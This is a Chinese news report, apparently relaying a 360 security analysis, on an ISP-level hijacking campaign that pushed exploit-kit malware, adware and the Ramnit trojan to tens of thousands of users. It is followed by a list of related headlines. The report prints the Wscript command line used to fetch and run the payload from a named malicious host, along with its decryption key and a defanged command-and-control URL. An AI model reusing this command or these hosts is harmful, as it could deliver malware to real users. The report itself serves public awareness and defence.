運營商再現大規模掛馬攻擊

2020-12-06 驅動中國
  • 來源: 齊魯晚報   2016-08-25/16:25
  • 今年7月,愛拍網等國內知名網站曾遭遇大規模掛馬致使敲詐者病毒大肆傳播。近日,360網際網路安全中心監測到愛拍網掛馬事件的幕後黑手再一次出招,雖然手法非常相似,但顯然該組織這一次的行動胃口更大——不再針對某些特定網站進行掛馬,而是玩起了網絡劫持,導致河南某運營商的8萬多用戶遭遇惡意推廣程序的攻擊。

    由於網絡劫持並不針對特定網站,所以此次掛馬事件中,包括IE瀏覽器、愛奇藝客戶端、迅雷、搜狗等在內的任何帶有展示網頁功能的客戶端都存在中招可能。具體掛馬行為詳見7月中旬的分析報告(http://bobao.360.cn/news/detail/3302.html)。

    與此前愛拍網掛馬事件相似,此次利用的也是EK(Exploit kits)黑客攻擊包實現掛馬操作。從帶有惡意代碼的Flash動畫到下載回來的執行惡意腳本的js代碼都與之前的情況出奇的相似,唯一有區別的是執行js腳本的命令行參數:

    Wscript //B //E:JScript GIF.INJExeCute "gexywoaxor"

    "http://www.zhongqiulipin.com/svchost.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR

    3.0.30729; .NET4.0C; .NET4.0E)"

    根據js代碼,第二個參數為木馬下載地址,第一個參數為解密秘鑰。

    由於換了參數,所以此次傳播的木馬本體也出現了變化——不再是威力大但「來錢慢」的敲詐者病毒,而變成了簡單粗暴「來錢快」的廣告推廣程序。

    樣本解碼後被釋放到「Documents and Settings」文件夾下的當前用戶根目錄中,並獲取了一個隨機的名稱再運行該木馬。

    木馬運行後會將自己隱藏:

    之後打開註冊表,將自己添加為啟動項:

    實現自啟動後,程序便去連接遠端頁面:

    拼接後可見訪問的頁面為:hxxp://b.zhongqiulipin.com/jiating.html,直接用瀏覽器打開看起來更直觀:

    獲取到推廣列表後,木馬便會依次下載並運行這些推廣程序以賺取佣金

    更惡劣的是,下載列表中不僅有商業推廣性質的程序,還帶有一些含有惡意代碼的程序,而巧合的,這些惡意代碼恰恰就是最近剛剛興起的Ramnit感染型木馬:

    Ramnit感染型木馬顯著的特點是入口點在一個含有惡意代碼的.rmnet節中,一旦運行則會感染全盤所有可執行程序。該木馬的更多分析內容詳見:

    http://software.it168.com/a2016/0819/2866/000002866185.shtml

    根據360網際網路安全中心的數據顯示,僅昨天(8月23日)一天,該掛馬事件影響到的用戶量就已超過8萬,今天這一數量還在增加。目前,360安全衛士已對該掛馬行為實現全面攔截。

    相關焦點

    • 本周網絡安全(3日-9日) 被掛馬政府類網站24個
      針對政府、企業以及廣大網際網路用戶的主要安全威脅來自於軟體高危漏洞、惡意代碼傳播以及網站攻擊。表格中僅列出了被篡改網站或被掛馬網站的域名,而非具體被篡改或被掛馬的頁面URL。本周監測發現境內被植入後門的政府類網站有55個(約佔境內3.8%),較上周環比減少了28.6%。根據通信行業各網際網路信息通報成員單位報送數據,本周共發現境內被掛馬政府類網站有24個(約佔境內14.8%),較上周環比下降了25%。
    • 江蘇省某政府網站部署浪潮SSR 嚴防黑客「任性」掛馬
      導語:政府行業的官網,歷來是遭受黑客攻擊的「重災區」,如何保證網站平臺安全可靠地運行是信息化安全管理的重中之重。為全面加強安全防禦能力,避免網頁被篡改、被掛馬、被境外黑客控制的情況發生,江蘇省某政府網站在「防微杜漸,主動出擊」的安全管理思想指導下,通過部署浪潮主機安全加固系統(以下簡稱SSR),利用特有的「三權分立」功能讓網站安全管理責任落地有聲,實現了信息安全管理體系的完整性,達成了網站安全管理縱深防禦的目標。   政府行業網站,已經成為了遭遇黑客攻擊的「重災區」。
    • 全美電話信號大規模中斷,三大運營商都受影響,美網友:外星人入侵?
      當地時間15日,美國出現大規模電話信號中斷的問題,三大主要電話運營商都受到影響。由於時機敏感,話題很快在推特上引發熱議。據今日俄羅斯報導,當地時間15日晚間開始,全美陸陸續續有用戶表示,電話出現信號中斷的問題。
    • 央視揭色情網站掛馬牟利真相:5個月賺10萬(圖)
      原標題:央視揭色情網站掛馬牟利真相:5個月賺10萬(圖) 《焦點訪談》曝光四川警方對「妹妹五月天」色情網站的破獲過程 中央電視臺《焦點訪談》節目日前曝光了四川警方對「妹妹五月天」色情網站的破獲過程,並指出,這類色情網站不僅提供淫穢色情內容,其背後還隱藏著令人難以察覺的木馬病毒利益鏈條
    • 網絡攻擊和防禦手段及其可能造成的後果
      常見的攻擊方法埠掃描:網絡攻擊的前奏網絡監聽∶區域網、HUB、ARP欺騙、網關設備郵件攻擊︰郵件炸彈、郵件欺騙網頁欺騙∶偽造網址、DNS重定向密碼破解∶字典破解、暴力破解、md5解密漏洞攻擊:溢出攻擊、系統漏洞利用種植木馬︰隱蔽、免殺、網站掛馬、郵件掛馬DoS、
    • 美國政府:12月大規模網絡攻擊「可能源自俄羅斯」
      俄羅斯衛星通訊社華盛頓1月6日消息 美國國土安全部網絡安全和基礎設施安全局(CISA)發表聲明稱,政府認為12月對聯邦機構的大規模網絡攻擊是為了獲取情報,「可能源自俄羅斯」。聲明稱,「這次網絡攻擊目標明確,執行者可能來自俄羅斯,對絕大多數或不久前查明即針對政府網絡也針對非政府網絡的攻擊負有責任。」對這次事件的調查還在繼續。
    • 快手再現大規模倒流,遊戲大主播再去鬥魚
      快手再現大規模倒流,遊戲大主播再去鬥魚 純白辦活動居然是為了去鬥魚直播純白籤約鬥魚
    • 美國大規模電話信號中斷 什麼情況?!
      當地時間15日,美國出現大規模電話信號中斷的問題,三大主要電話運營商都受到影響。由於時機敏感,話題很快在推特上引發熱議。據今日俄羅斯報導,當地時間15日晚間開始,全美陸陸續續有用戶表示,電話出現信號中斷的問題。受到影響的運營商包括T-Mobile、AT&;T、Verizon,還有一些較小規模的運營商。
    • 運營商公布大規模集採 華為中興和大唐電信瓜分
      運營商公布大規模集採 華為中興和大唐電信瓜分 李正豪 發表於 2020-03-21 11:06:21 在「新基建」國家戰略之下,中國正在為全球通信設備市場帶來巨大機遇
    • 網站被攻擊的常見形式有哪些?應如何應對?
      現在做網站的站長都有一個心裡,網站受攻擊是在所難免的事,特別是一些比較熱門的行業以及一些比較小的企業,更是被這些攻擊整得焦頭爛額。那麼如果我們要解決攻擊的問題,我們就必須去了解攻擊到底是一個什麼東西,具體的攻擊有什麼形式。隨著網際網路的迅速發展,網絡安全面臨著嚴峻的挑戰,一些惡意的網絡伺服器行為也層出不窮。
    • 勒索病毒WannaCry「想哭」再現2.0版 手機電腦都跑不了
      英國、俄羅斯、義大利相繼淪陷英國方面, 5月12日英國國家醫療服務體系遭遇了大規模網絡攻擊,多家公立醫院的電腦系統幾乎同時癱瘓,電話線路也被切斷,導致很多急診病人被迫轉移。《每日郵報》稱,至少19家位於英格蘭和蘇格蘭的NHS所屬醫療機構遭到網絡攻擊,這些機構包括醫院和全科醫生診所。
    • 川普宣稱中國應該對美國政府遭受的大規模網絡攻擊負責,外交部回應
      【環球時報-環球網報導 記者 李司坤】21日,有來自法新社的記者在當天舉行的外交部例行記者會上提問稱,美國總統川普周六發布的推特說,中國應該對美國政府遭受的大規模網絡攻擊負責,中方對此有何評論?對此,發言人汪文斌回應表示,中方堅決反對把網絡安全問題政治化、汙名化的做法。
    • 日本再現飛行黑科技,預計2023可以大規模投產
      比如說前段時間日本就再現了飛行黑科技,在日本有一家名叫sky drive的公司,一直以來都致力於製造飛行汽車這家日本公司還表示大概三年之後,也就是預計2023年就可以大規模投產,到時候飛行器的速度甚至能夠達到100公裡每小時
    • 安全漏洞XSS、CSRF、SQL注入以及DDOS攻擊
      2、XSS攻擊的危害 盜取用戶資料,比如:登錄帳號、網銀帳號等 利用用戶身份,讀取、篡改、添加、刪除數據等 盜竊重要的具有商業價值的資料 非法轉帳 強制發送電子郵件 網站掛馬 控制受害者機器向其它網站發起攻擊3、防止XSS解決方案 XSS的根源主要是沒完全過濾客戶端提交的數據
    • 運營商拿到5G中低頻段許可,意味著什麼?
      儘管4G時代,三大運營商的口號都是TDD和FDD共建,但實際執行中,移動以TDD為主,聯通電信以FDD為重心。因此,騰退2600Hz頻譜對這兩大運營商影響並不大,同時給移動5G建設提供了極大的便利。同樣的,中國移動騰退的900MHz、1800MHz頻譜,則給其他兩家運營商在4G建設上有了更加大的空間。2G、3G誰去誰留?
    • 263推新業務轉向虛擬電信運營商
      據悉,許多電信運營商的後臺及業務,曾經是263參與策劃、實施的。該公司一位內部員工稱,263實際上是電信運營商的僱傭軍、試驗田,並成為運營商市場份額擴大的同盟軍。  但是,以往的263戰略並不清晰,在大眾的印象中或是一家網際網路企業,或是一家ISP,或是一家電子郵件服務商。該公司在電信增值業務上異常低調,如96446業務,所堅持的推廣思路是淡化263品牌強化網通品牌。
    • 遭到某種未知武器攻擊,士兵大規模頭暈嘔吐
      印度今年的舉動可謂十分異常,頻頻向周邊國家發起挑釁,不過隨著深冬季節的來臨,那些駐紮在邊境尤其是高原地區的士兵,陷入了一種新的困境中,除了需要應對高原反應外,還需要應對刺骨的寒冷,而現在印度又發生了什麼,致使大批印度士兵頻頻病危,出現大規模頭暈嘔吐的現象,而印軍稱出現這些現象,是疑似遭到了某種未知的聲波武器攻擊
    • 大規模惡意廣告活動每周進行多達 40000 次的感染
      近日網絡安全公司Check Point發布的一份關於一場大規模的惡意廣告活動的報告。